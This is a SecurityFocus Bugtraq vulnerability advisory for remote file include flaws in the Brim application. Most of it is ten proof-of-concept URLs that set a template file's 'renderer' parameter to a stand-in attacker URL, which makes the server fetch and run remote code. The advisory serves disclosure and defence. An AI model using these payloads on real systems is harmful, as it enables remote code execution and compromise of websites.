Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Brim Multiple Remote File Include Vulnerabilities

Attackers can exploit this issue with a web client.

The following proof-of-concept examples are available:

http://www.example.com/[path]/templates/barrel/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/sidebar/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/text-only/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/slashdot/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/penguin/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/pda/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/oerdec/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/nifty/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/mylook/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/barry/template.tpl.php?renderer=http://attacker_file







 

Privacy Statement
Copyright 2009, SecurityFocus